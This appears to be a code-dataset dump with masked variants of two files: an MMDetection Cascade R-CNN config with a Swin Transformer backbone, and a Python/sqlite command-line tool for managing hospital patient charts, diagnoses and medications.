the model\nmodel.fit(\n X = train,\n eval_data = val,\n batch_end_callback = mx.callback.Speedometer(batch_size, 50),\n epoch_end_callback = mx.callback.do_checkpoint(model_prefix))\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
_base_ = [
'../models/cascade_rcnn_r50_fpn.py',
#'coco_instance.py',
'../datasets/dataset.py',
'../runtime/valid_search_wandb_runtime.py',
'../schedules/schedule_1x.py'
]
pretrained = 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_tiny_patch4_window7_224.pth' # noqa
model = dict(
type='CascadeRCNN',
backbone=dict(
_delete_=True,
type='SwinTransformer',
embed_dims=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
mlp_ratio=4,
qkv_bias=True,
qk_scale=None,
drop_rate=0.,
attn_drop_rate=0.,
drop_path_rate=0.2,
patch_norm=True,
out_indices=(0, 1, 2, 3),
with_cp=False,
convert_weights=True,
init_cfg=dict(type='Pretrained', checkpoint=pretrained)),
neck=dict(in_channels=[96, 192, 384, 768])
#[256, 512, 1024, 2048]
)
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
# augmentation strategy originates from DETR / Sparse RCNN
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(
type='AutoAugment',
policies=[[
dict(
type='Resize',
img_scale=[(480, 1024), (512, 1024), (544, 1024), (576, 1024),
(608, 1024), (640, 1024), (672, 1024), (704, 1024),
(736, 1024), (768, 1024), (800, 1024)],
multiscale_mode='value',
keep_ratio=True)
],
[
dict(
type='Resize',
img_scale=[(400, 1024), (500, 1024), (600, 1024)],
multiscale_mode='value',
keep_ratio=True),
dict(
type='RandomCrop',
crop_type='absolute_range',
crop_size=(384, 600),
allow_negative_crop=True),
dict(
type='Resize',
img_scale=[(480, 1024), (512, 1024), (544, 1024),
(576, 1024), (608, 1024), (640, 1024),
(672, 1024), (704, 1024), (736, 1024),
(768, 1024), (800, 1024)],
multiscale_mode='value',
override=True,
keep_ratio=True)
]]),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
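# note: the validation pipeline below reuses the same flip/AutoAugment policies as training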
val_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(
type='AutoAugment',
policies=[[
dict(
type='Resize',
img_scale=[(480, 1024), (512, 1024), (544, 1024), (576, 1024),
(608, 1024), (640, 1024), (672, 1024), (704, 1024),
(736, 1024), (768, 1024), (800, 1024)],
multiscale_mode='value',
keep_ratio=True)
],
[
dict(
type='Resize',
img_scale=[(400, 1024), (500, 1024), (600, 1024)],
multiscale_mode='value',
keep_ratio=True),
dict(
type='RandomCrop',
crop_type='absolute_range',
crop_size=(384, 600),
allow_negative_crop=True),
dict(
type='Resize',
img_scale=[(480, 1024), (512, 1024), (544, 1024),
(576, 1024), (608, 1024), (640, 1024),
(672, 1024), (704, 1024), (736, 1024),
(768, 1024), (800, 1024)],
multiscale_mode='value',
override=True,
keep_ratio=True)
]]),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
data = dict(train=dict(pipeline=train_pipeline),val=dict(pipeline=val_pipeline))
evaluation = dict(interval=1, metric='bbox', save_best='bbox_mAP_50')
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(
# type='WandbLoggerHook',
# init_kwargs=dict(
# project='valid_search',
# name='YOUR_EXP'
# ))
])
# yapf:enable
custom_hooks = [dict(type='NumClassCheckHook')]
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
optimizer = dict(
_delete_=True,
type='AdamW',
lr=0.0001,
betas=(0.9, 0.999),
weight_decay=0.05,
paramwise_cfg=dict(
custom_keys={
'absolute_pos_embed': dict(decay_mult=0.),
'relative_position_bias_table': dict(decay_mult=0.),
'norm': dict(decay_mult=0.)
}))
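# warmup settings come from the base schedule; step-decay the LR at epochs 27 and 33 of the 36-epoch run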
lr_config = dict(warmup_iters=1000, step=[27, 33])
runner = dict(max_epochs=36)
|
normal
|
{
"blob_id": "2874e05d6d5e0f13924e5920db22ea3343707dfa",
"index": 3898,
"step-1": "<mask token>\n",
"step-2": "_base_ = ['../models/cascade_rcnn_r50_fpn.py', '../datasets/dataset.py',\n '../runtime/valid_search_wandb_runtime.py', '../schedules/schedule_1x.py']\npretrained = (\n 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_tiny_patch4_window7_224.pth'\n )\nmodel = dict(type='CascadeRCNN', backbone=dict(_delete_=True, type=\n 'SwinTransformer', embed_dims=96, depths=[2, 2, 6, 2], num_heads=[3, 6,\n 12, 24], window_size=7, mlp_ratio=4, qkv_bias=True, qk_scale=None,\n drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.2, patch_norm=True,\n out_indices=(0, 1, 2, 3), with_cp=False, convert_weights=True, init_cfg\n =dict(type='Pretrained', checkpoint=pretrained)), neck=dict(in_channels\n =[96, 192, 384, 768]))\nimg_norm_cfg = dict(mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, \n 57.375], to_rgb=True)\ntrain_pipeline = [dict(type='LoadImageFromFile'), dict(type=\n 'LoadAnnotations', with_bbox=True), dict(type='RandomFlip', flip_ratio=\n 0.5), dict(type='AutoAugment', policies=[[dict(type='Resize', img_scale\n =[(480, 1024), (512, 1024), (544, 1024), (576, 1024), (608, 1024), (640,\n 1024), (672, 1024), (704, 1024), (736, 1024), (768, 1024), (800, 1024)],\n multiscale_mode='value', keep_ratio=True)], [dict(type='Resize',\n img_scale=[(400, 1024), (500, 1024), (600, 1024)], multiscale_mode=\n 'value', keep_ratio=True), dict(type='RandomCrop', crop_type=\n 'absolute_range', crop_size=(384, 600), allow_negative_crop=True), dict\n (type='Resize', img_scale=[(480, 1024), (512, 1024), (544, 1024), (576,\n 1024), (608, 1024), (640, 1024), (672, 1024), (704, 1024), (736, 1024),\n (768, 1024), (800, 1024)], multiscale_mode='value', override=True,\n keep_ratio=True)]]), dict(type='Normalize', **img_norm_cfg), dict(type=\n 'Pad', size_divisor=32), dict(type='DefaultFormatBundle'), dict(type=\n 'Collect', keys=['img', 'gt_bboxes', 'gt_labels'])]\nval_pipeline = [dict(type='LoadImageFromFile'), dict(type='LoadAnnotations',\n with_bbox=True), dict(type='RandomFlip', flip_ratio=0.5), dict(type=\n 'AutoAugment', policies=[[dict(type='Resize', img_scale=[(480, 1024), (\n 512, 1024), (544, 1024), (576, 1024), (608, 1024), (640, 1024), (672, \n 1024), (704, 1024), (736, 1024), (768, 1024), (800, 1024)],\n multiscale_mode='value', keep_ratio=True)], [dict(type='Resize',\n img_scale=[(400, 1024), (500, 1024), (600, 1024)], multiscale_mode=\n 'value', keep_ratio=True), dict(type='RandomCrop', crop_type=\n 'absolute_range', crop_size=(384, 600), allow_negative_crop=True), dict\n (type='Resize', img_scale=[(480, 1024), (512, 1024), (544, 1024), (576,\n 1024), (608, 1024), (640, 1024), (672, 1024), (704, 1024), (736, 1024),\n (768, 1024), (800, 1024)], multiscale_mode='value', override=True,\n keep_ratio=True)]]), dict(type='Normalize', **img_norm_cfg), dict(type=\n 'Pad', size_divisor=32), dict(type='DefaultFormatBundle'), dict(type=\n 'Collect', keys=['img', 'gt_bboxes', 'gt_labels'])]\ndata = dict(train=dict(pipeline=train_pipeline), val=dict(pipeline=\n val_pipeline))\nevaluation = dict(interval=1, metric='bbox', save_best='bbox_mAP_50')\ncheckpoint_config = dict(interval=1)\nlog_config = dict(interval=50, hooks=[dict(type='TextLoggerHook')])\ncustom_hooks = [dict(type='NumClassCheckHook')]\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\noptimizer = dict(_delete_=True, type='AdamW', lr=0.0001, betas=(0.9, 0.999),\n weight_decay=0.05, paramwise_cfg=dict(custom_keys={'absolute_pos_embed':\n 
dict(decay_mult=0.0), 'relative_position_bias_table': dict(decay_mult=\n 0.0), 'norm': dict(decay_mult=0.0)}))\nlr_config = dict(warmup_iters=1000, step=[27, 33])\nrunner = dict(max_epochs=36)\n",
"step-3": "_base_ = [\n '../models/cascade_rcnn_r50_fpn.py',\n #'coco_instance.py',\n '../datasets/dataset.py',\n '../runtime/valid_search_wandb_runtime.py',\n '../schedules/schedule_1x.py'\n]\npretrained = 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_tiny_patch4_window7_224.pth' # noqa\nmodel = dict(\n type='CascadeRCNN',\n backbone=dict(\n _delete_=True,\n type='SwinTransformer',\n embed_dims=96,\n depths=[2, 2, 6, 2],\n num_heads=[3, 6, 12, 24],\n window_size=7,\n mlp_ratio=4,\n qkv_bias=True,\n qk_scale=None,\n drop_rate=0.,\n attn_drop_rate=0.,\n drop_path_rate=0.2,\n patch_norm=True,\n out_indices=(0, 1, 2, 3),\n with_cp=False,\n convert_weights=True,\n init_cfg=dict(type='Pretrained', checkpoint=pretrained)),\n neck=dict(in_channels=[96, 192, 384, 768])\n #[256, 512, 1024, 2048]\n)\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\n\n# augmentation strategy originates from DETR / Sparse RCNN\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(\n type='AutoAugment',\n policies=[[\n dict(\n type='Resize',\n img_scale=[(480, 1024), (512, 1024), (544, 1024), (576, 1024),\n (608, 1024), (640, 1024), (672, 1024), (704, 1024),\n (736, 1024), (768, 1024), (800, 1024)],\n multiscale_mode='value',\n keep_ratio=True)\n ],\n [\n dict(\n type='Resize',\n img_scale=[(400, 1024), (500, 1024), (600, 1024)],\n multiscale_mode='value',\n keep_ratio=True),\n dict(\n type='RandomCrop',\n crop_type='absolute_range',\n crop_size=(384, 600),\n allow_negative_crop=True),\n dict(\n type='Resize',\n img_scale=[(480, 1024), (512, 1024), (544, 1024),\n (576, 1024), (608, 1024), (640, 1024),\n (672, 1024), (704, 1024), (736, 1024),\n (768, 1024), (800, 1024)],\n multiscale_mode='value',\n override=True,\n keep_ratio=True)\n ]]),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),\n]\nval_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(\n type='AutoAugment',\n policies=[[\n dict(\n type='Resize',\n img_scale=[(480, 1024), (512, 1024), (544, 1024), (576, 1024),\n (608, 1024), (640, 1024), (672, 1024), (704, 1024),\n (736, 1024), (768, 1024), (800, 1024)],\n multiscale_mode='value',\n keep_ratio=True)\n ],\n [\n dict(\n type='Resize',\n img_scale=[(400, 1024), (500, 1024), (600, 1024)],\n multiscale_mode='value',\n keep_ratio=True),\n dict(\n type='RandomCrop',\n crop_type='absolute_range',\n crop_size=(384, 600),\n allow_negative_crop=True),\n dict(\n type='Resize',\n img_scale=[(480, 1024), (512, 1024), (544, 1024),\n (576, 1024), (608, 1024), (640, 1024),\n (672, 1024), (704, 1024), (736, 1024),\n (768, 1024), (800, 1024)],\n multiscale_mode='value',\n override=True,\n keep_ratio=True)\n ]]),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),\n]\ndata = dict(train=dict(pipeline=train_pipeline),val=dict(pipeline=val_pipeline))\nevaluation = dict(interval=1, metric='bbox', save_best='bbox_mAP_50')\n\ncheckpoint_config = dict(interval=1)\n# yapf:disable\nlog_config = dict(\n interval=50,\n hooks=[\n dict(type='TextLoggerHook'),\n # dict(\n # type='WandbLoggerHook',\n # init_kwargs=dict(\n # 
project='valid_search',\n # name='YOUR_EXP'\n # ))\n ])\n# yapf:enable\ncustom_hooks = [dict(type='NumClassCheckHook')]\n\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\n\noptimizer = dict(\n _delete_=True,\n type='AdamW',\n lr=0.0001,\n betas=(0.9, 0.999),\n weight_decay=0.05,\n paramwise_cfg=dict(\n custom_keys={\n 'absolute_pos_embed': dict(decay_mult=0.),\n 'relative_position_bias_table': dict(decay_mult=0.),\n 'norm': dict(decay_mult=0.)\n }))\nlr_config = dict(warmup_iters=1000, step=[27, 33])\nrunner = dict(max_epochs=36)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import sqlite3
import os
#Search for a patient by name
#The doctor enters a name and the system finds patient names similar to it
#Once matches are found, the system outputs the list of matched patient names
#The doctor then selects a patient to continue
def patientSelect(CONN, staff):
c = CONN.cursor()
print("Search for Patient")
select = input("Enter patient name(type 'exit' to leave): ")
if select == 'exit':
os.system('clear')
#return doctorMenu(CONN, staff[0])
return
c.execute('''SELECT hcno, name FROM patients WHERE name LIKE ?''', ('%'+select+'%',))
rows = c.fetchall()
if len(rows) == 0:
print("No patient found, please try again")
return patientSelect(CONN, staff)
count = 1
for x in rows:
print(str(count)+": patient hcno "+x[0]+"; patient name: "+x[1])
count = count + 1
try:
select = input("Please select your patient: ")
selectedPatient = int(select)-1
patientHCNO = rows[selectedPatient][0]
patientName = rows[selectedPatient][1]
patient = (patientHCNO, patientName)
except:
print("Invalid input, please try again")
return patientSelect(CONN, staff)
return patientChart(CONN, staff, patient)
#Output the tables related to the patient
#The doctor can select an open chart to continue
def patientChart(CONN, staff, patient):
c = CONN.cursor()
os.system('clear')
print("Patient HCNO: " + patient[0] + ", Patient Name: " + patient[1])
c.execute('''SELECT *
FROM charts
WHERE hcno = ?
ORDER BY adate
''', (patient[0],))
rows = c.fetchall()
count = 1
checkOpenChart = 0
for x in rows:
print(str(count)+": chart id: "+x[0]+"; patient hcno: "+ x[1] + "; admission time: "+x[2], end="")
if x[3] is None:
print(" discharge time: " + "Status: open.")
checkOpenChart = checkOpenChart + 1
else:
print(" discharge time: " + x[3] + "Status: close.")
count = count + 1;
if checkOpenChart == 0:
print("No open chart")
openChart = input("Do you want to create a new chart (y/n):")
if openChart == 'y':
print("Open chart")
return addChart(CONN, staff, patient)
else:
print("")
print("You have an open chart. If you want a new chart, close the open chart first")
try:
select = input("Please select a chart to continue(type 'exit' to leave): ")
if select == 'exit':
os.system('clear')
return patientSelect(CONN, staff)
selectChart = int(select)-1
chart_id = rows[selectChart][0]
except:
print("Invalid enry")
return patientChart(CONN, staff, patient)
if rows[selectChart][3] is None:
editAble = 1
else:
editAble = 0
return viewChart(CONN, chart_id, staff, patient, editAble)
#View a list of charts that related to the patient
def viewChart(CONN, chart_id, staff, patient, editAble):
c = CONN.cursor()
os.system('clear')
print("Patient HCNO: " + patient[0] + ", Patient Name: " + patient[1])
print("symptoms table")
c.execute('''SELECT *
FROM symptoms
WHERE hcno = ? AND chart_id = ?
ORDER BY obs_date;''', (patient[0], chart_id))
rows = c.fetchall()
for x in rows:
print(x)
print("diagnosis table")
c.execute('''SELECT *
FROM diagnoses
WHERE hcno = ? AND chart_id = ?
ORDER BY ddate;''', (patient[0], chart_id))
rows = c.fetchall()
for x in rows:
print(x)
print("medication table")
c.execute('''SELECT *
FROM medications
WHERE hcno = ? AND chart_id = ?
ORDER BY mdate;''', (patient[0], chart_id))
rows = c.fetchall()
for x in rows:
print(x)
if editAble == 0:
input("Press any key to return: ")
return patientChart(CONN, staff, patient)
if staff[1] == 'D':
return doctorChartMenu(CONN, patient, chart_id, staff)
elif staff[1] == 'N':
return nurseChartMenu(CONN, patient, chart_id, staff)
#If the chart is open, the doctor can edit it: add symptoms, diagnoses, and medications
def doctorChartMenu(CONN, patient, chart_id, staff):
print("==========Chart Menu==========")
print("1. Add a symptoms")
print("2. Add a Diagnosis")
print("3. Add a medication")
print("4. Exit")
select = input("Please select an option to continue: ")
if select == '1':
print("Add symptoms")
os.system('clear')
return addSymptoms(CONN, patient, chart_id, staff)
elif select == '2':
print("Add Diagnosis")
os.system('clear')
return addDiagnosis(CONN, patient, chart_id, staff)
elif select == '3':
print("Add medication")
os.system('clear')
return addMedication(CONN, patient, chart_id, staff)
elif select == '4':
return patientChart(CONN, staff, patient)
else:
print("Invalid entry, please try again")
return patientSelect(CONN, staff)
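#Nurse version of the chart menu: nurses can record symptoms and close the chart,
#but cannot add diagnoses or medications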
def nurseChartMenu(CONN, patient, chart_id, staff):
print("Chart Menu")
print("1. Add a symptoms")
print("2. close chart")
print("3. Exit")
select = input("Please select an option to cintinue: ")
if select == '1':
os.system('clear')
return addSymptoms(CONN, patient, chart_id, staff)
elif select == '2':
print("xx")
return closeChart(CONN, patient, chart_id, staff)
elif select == '3':
return patientChart(CONN, staff, patient)
else:
print("Invalid, please try again")
return patientSelect(CONN, staff)
#Insert a symptom
#Ask the doctor for a symptom name
#Observation date will be the current time
# The function will return to viewChart()
def addSymptoms(CONN, patient, chart_id, staff):
c = CONN.cursor()
symptoms = input("Please enter a symptom: ")
while len(symptoms) == 0:
symptoms = input("Please enter a symptom: ")
c.execute('''INSERT INTO symptoms VALUES
(?,?,?,DateTime('now','localtime'),?);''',(patient[0], chart_id, staff[0], symptoms))
CONN.commit()
return viewChart(CONN, chart_id, staff, patient, 1)
# Insert a diagnosis
# Will prompt for a diagnosis name
# Observation date will be the current time
# Return to viewChart() after finish
def addDiagnosis(CONN, patient, chart_id, staff):
#Insert a diagnosis
c = CONN.cursor()
diagnosis = input("Please enter a diagnosis: ")
while len(diagnosis) == 0:
diagnosis = input("Please enter a diagnosis: ")
c.execute('''INSERT INTO diagnoses VALUES
(?,?,?,DateTime('now', 'localtime'),?);''',(patient[0], chart_id, staff[0], diagnosis))
CONN.commit()
return viewChart(CONN, chart_id, staff, patient, 1)
# Insert a medication
# Will prompt for a medication name
# start date will be today
# Return to viewChart() after finish
def addMedication(CONN, patient, chart_id, staff):
c = CONN.cursor()
c.execute("SELECT * FROM patients WHERE hcno = ?;",(patient[0],))
rows = c.fetchone()
patientAge = rows[2]
    #Get medication name; if it does not exist in the database, return to the previous page
medicationName = input("Please enter a medication: ")
c.execute("SELECT sug_amount FROM dosage WHERE drug_name = ? AND age_group = ?;", (medicationName,patientAge))
dosageAmount = c.fetchone()
if dosageAmount == None:
print("Drug Name not exist")
input("Press any key to return")
return viewChart(CONN, chart_id, staff, patient, 1)
    c.execute('''SELECT drug_name FROM reportedallergies WHERE hcno = ?;''', (patient[0],))
    # fetchall avoids a crash when the patient has no reported allergies (fetchone would return None)
    allergies = c.fetchall()
    for x in allergies:
        if x[0] == medicationName:
            print("WARNING, the patient is allergic to "+ x[0])
c.execute('''SELECT canbe_alg FROM inferredallergies WHERE alg = ?;''',(medicationName,))
inferallergies = c.fetchall()
for x in inferallergies:
print("Patinet can be allergic to: " + x[0])
    # Get prescription amount; if larger than the suggested amount, display a warning message
    amount = int(input("Medication amount: "))
    if amount > dosageAmount[0]:
        print("Suggested amount: "+ str(dosageAmount[0]))
        confirm = input("WARNING: Prescribed amount is greater than the suggested amount. Confirm (y/n): ")
if confirm == 'n':
return viewChart(CONN, chart_id, staff, patient, 1)
#Get medication period
day = input("Medication length(in days): ")
c.execute('''INSERT INTO medications VALUES
(?,?,?,DateTime('now', 'localtime'), DateTime('now','localtime'),DateTime('now',?,'localtime'),?,?);''',(patient[0], chart_id, staff[0], '+'+day+' day', amount, medicationName))
CONN.commit()
return viewChart(CONN, chart_id, staff, patient, 1)
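#Close an open chart after confirmation
#Sets the chart's discharge time (edate) to the current time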
def closeChart(CONN, patient, chart_id, staff):
c = CONN.cursor()
c.execute("SELECT * FROM charts WHERE chart_id = ?;", (chart_id,))
rows = c.fetchone()
if rows[3] is None:
print("Close chart id "+str(chart_id)+"?")
print("1. Yes.")
print("2. No.")
result = input("Please enter your choice: ")
if result == '1':
print("Closing chart.")
c.execute('''UPDATE charts SET edate = DateTime('now','localtime')
WHERE chart_id = ?;''', (chart_id,))
CONN.commit()
return viewChart(CONN, chart_id, staff, patient, 1)
elif result == '2':
return viewChart(CONN, chart_id, staff, patient, 1)
else:
print("Invalid")
            return closeChart(CONN, patient, chart_id, staff)
    else:
        print("Chart is already closed.")
        return viewChart(CONN, chart_id, staff, patient, 0)
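#Create a new patient record from user input; duplicate health care numbers are rejected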
def addPatient(CONN, staff):
c = CONN.cursor()
print("==========New Patient Record==========")
name = input("Please enter patient name: ")
hcno = input("Please enter patient HCNO: ")
try:
testHcno = int(hcno)
except:
print("Invalid HCNO, please try again")
return addPatient(CONN, staff)
age_group = input("Please enter age group: ")
address = input("Please enter address: ")
phone = input("Please enter phone number: ")
emg_phone = input("Please enter emergency phone number: ")
try:
c.execute('''INSERT INTO patients VALUES
(?,?,?,?,?,?);''',(hcno, name, age_group, address, phone, emg_phone))
CONN.commit()
print("Patient record created.")
except:
print("Invalid entry, patient already exists")
def addChart(CONN, staff, patient):
c = CONN.cursor()
#phcno = input("Please enter patient health care #: ")
c.execute("SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;")
last_chart = c.fetchone()
if last_chart[0] is not None:
new_chart_id = int(last_chart[0])+1
else:
new_chart_id = '00001'
c.execute('''INSERT INTO charts VALUES
(?,?, DateTime('now','localtime'), ?);''', (new_chart_id, patient[0], None))
c.execute("SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;", (patient[0],))
CONN.commit()
print("A new chart had been create. Chart ID: "+ str(new_chart_id))
return patientChart(CONN, staff, patient)
|
normal
|
{
"blob_id": "b3b4d27b60c71cbd979ad4887fa80408665ea1ac",
"index": 2853,
"step-1": "<mask token>\n\n\ndef patientSelect(CONN, staff):\n c = CONN.cursor()\n print('Search for Patient')\n select = input(\"Enter patient name(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return\n c.execute('SELECT hcno, name FROM patients WHERE name LIKE ?', ('%' +\n select + '%',))\n rows = c.fetchall()\n if len(rows) == 0:\n print('No patient found, please try again')\n return patientSelect(CONN, staff)\n count = 1\n for x in rows:\n print(str(count) + ': patient hcno ' + x[0] + '; patient name: ' + x[1]\n )\n count = count + 1\n try:\n select = input('Please select your patient: ')\n selectedPatient = int(select) - 1\n patientHCNO = rows[selectedPatient][0]\n patientName = rows[selectedPatient][1]\n patient = patientHCNO, patientName\n except:\n print('Invalid input, please try again')\n return patientSelect(CONN, staff)\n return patientChart(CONN, staff, patient)\n\n\n<mask token>\n\n\ndef doctorChartMenu(CONN, patient, chart_id, staff):\n print('==========Chart Menu==========')\n print('1. Add a symptoms')\n print('2. Add a Diagnosis')\n print('3. Add a medication')\n print('4. Exit')\n select = input('Please select an option to continue: ')\n if select == '1':\n print('Add symptoms')\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('Add Diagnosis')\n os.system('clear')\n return addDiagnosis(CONN, patient, chart_id, staff)\n elif select == '3':\n print('Add medication')\n os.system('clear')\n return addMedication(CONN, patient, chart_id, staff)\n elif select == '4':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid entry, please try again')\n return patientSelect(CONN, staff)\n\n\ndef nurseChartMenu(CONN, patient, chart_id, staff):\n print('Chart Menu')\n print('1. Add a symptoms')\n print('2. close chart')\n print('3. Exit')\n select = input('Please select an option to cintinue: ')\n if select == '1':\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('xx')\n return closeChart(CONN, patient, chart_id, staff)\n elif select == '3':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid, please try again')\n return patientSelect(CONN, staff)\n\n\ndef addSymptoms(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n symptoms = input('Please enter a symptom: ')\n while len(symptoms) == 0:\n symptoms = input('Please enter a symptom: ')\n c.execute(\n \"\"\"INSERT INTO symptoms VALUES\n (?,?,?,DateTime('now','localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], symptoms))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\n<mask token>\n\n\ndef closeChart(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM charts WHERE chart_id = ?;', (chart_id,))\n rows = c.fetchone()\n if rows[3] is None:\n print('Close chart id ' + str(chart_id) + '?')\n print('1. Yes.')\n print('2. 
No.')\n result = input('Please enter your choice: ')\n if result == '1':\n print('Closing chart.')\n c.execute(\n \"\"\"UPDATE charts SET edate = DateTime('now','localtime')\n WHERE chart_id = ?;\"\"\"\n , (chart_id,))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n elif result == '2':\n return viewChart(CONN, chart_id, staff, patient, 1)\n else:\n print('Invalid')\n return closeChart(CONN, patient, chart_id, staff)\n\n\ndef addPatient(CONN, staff):\n c = CONN.cursor()\n print('==========New Patient Record==========')\n name = input('Please enter patient name: ')\n hcno = input('Please enter patient HCNO: ')\n try:\n testHcno = int(hcno)\n except:\n print('Invalid HCNO, please try again')\n return addPatient(CONN, staff)\n age_group = input('Please enter age group: ')\n address = input('Please enter address: ')\n phone = input('Please enter phone number: ')\n emg_phone = input('Please enter emergency phone number: ')\n try:\n c.execute(\"\"\"INSERT INTO patients VALUES\n (?,?,?,?,?,?);\"\"\",\n (hcno, name, age_group, address, phone, emg_phone))\n CONN.commit()\n print('Patient record created.')\n except:\n print('Invalid entry, patient already exists')\n\n\ndef addChart(CONN, staff, patient):\n c = CONN.cursor()\n c.execute('SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;')\n last_chart = c.fetchone()\n if last_chart[0] is not None:\n new_chart_id = int(last_chart[0]) + 1\n else:\n new_chart_id = '00001'\n c.execute(\n \"\"\"INSERT INTO charts VALUES\n (?,?, DateTime('now','localtime'), ?);\"\"\"\n , (new_chart_id, patient[0], None))\n c.execute(\n 'SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;',\n (patient[0],))\n CONN.commit()\n print('A new chart had been create. Chart ID: ' + str(new_chart_id))\n return patientChart(CONN, staff, patient)\n",
"step-2": "<mask token>\n\n\ndef patientSelect(CONN, staff):\n c = CONN.cursor()\n print('Search for Patient')\n select = input(\"Enter patient name(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return\n c.execute('SELECT hcno, name FROM patients WHERE name LIKE ?', ('%' +\n select + '%',))\n rows = c.fetchall()\n if len(rows) == 0:\n print('No patient found, please try again')\n return patientSelect(CONN, staff)\n count = 1\n for x in rows:\n print(str(count) + ': patient hcno ' + x[0] + '; patient name: ' + x[1]\n )\n count = count + 1\n try:\n select = input('Please select your patient: ')\n selectedPatient = int(select) - 1\n patientHCNO = rows[selectedPatient][0]\n patientName = rows[selectedPatient][1]\n patient = patientHCNO, patientName\n except:\n print('Invalid input, please try again')\n return patientSelect(CONN, staff)\n return patientChart(CONN, staff, patient)\n\n\n<mask token>\n\n\ndef doctorChartMenu(CONN, patient, chart_id, staff):\n print('==========Chart Menu==========')\n print('1. Add a symptoms')\n print('2. Add a Diagnosis')\n print('3. Add a medication')\n print('4. Exit')\n select = input('Please select an option to continue: ')\n if select == '1':\n print('Add symptoms')\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('Add Diagnosis')\n os.system('clear')\n return addDiagnosis(CONN, patient, chart_id, staff)\n elif select == '3':\n print('Add medication')\n os.system('clear')\n return addMedication(CONN, patient, chart_id, staff)\n elif select == '4':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid entry, please try again')\n return patientSelect(CONN, staff)\n\n\ndef nurseChartMenu(CONN, patient, chart_id, staff):\n print('Chart Menu')\n print('1. Add a symptoms')\n print('2. close chart')\n print('3. Exit')\n select = input('Please select an option to cintinue: ')\n if select == '1':\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('xx')\n return closeChart(CONN, patient, chart_id, staff)\n elif select == '3':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid, please try again')\n return patientSelect(CONN, staff)\n\n\ndef addSymptoms(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n symptoms = input('Please enter a symptom: ')\n while len(symptoms) == 0:\n symptoms = input('Please enter a symptom: ')\n c.execute(\n \"\"\"INSERT INTO symptoms VALUES\n (?,?,?,DateTime('now','localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], symptoms))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addDiagnosis(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n diagnosis = input('Please enter a diagnosis: ')\n while len(diagnosis) == 0:\n diagnosis = input('Please enter a diagnosis: ')\n c.execute(\n \"\"\"INSERT INTO diagnoses VALUES\n (?,?,?,DateTime('now', 'localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], diagnosis))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addMedication(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM patients WHERE hcno = ?;', (patient[0],))\n rows = c.fetchone()\n patientAge = 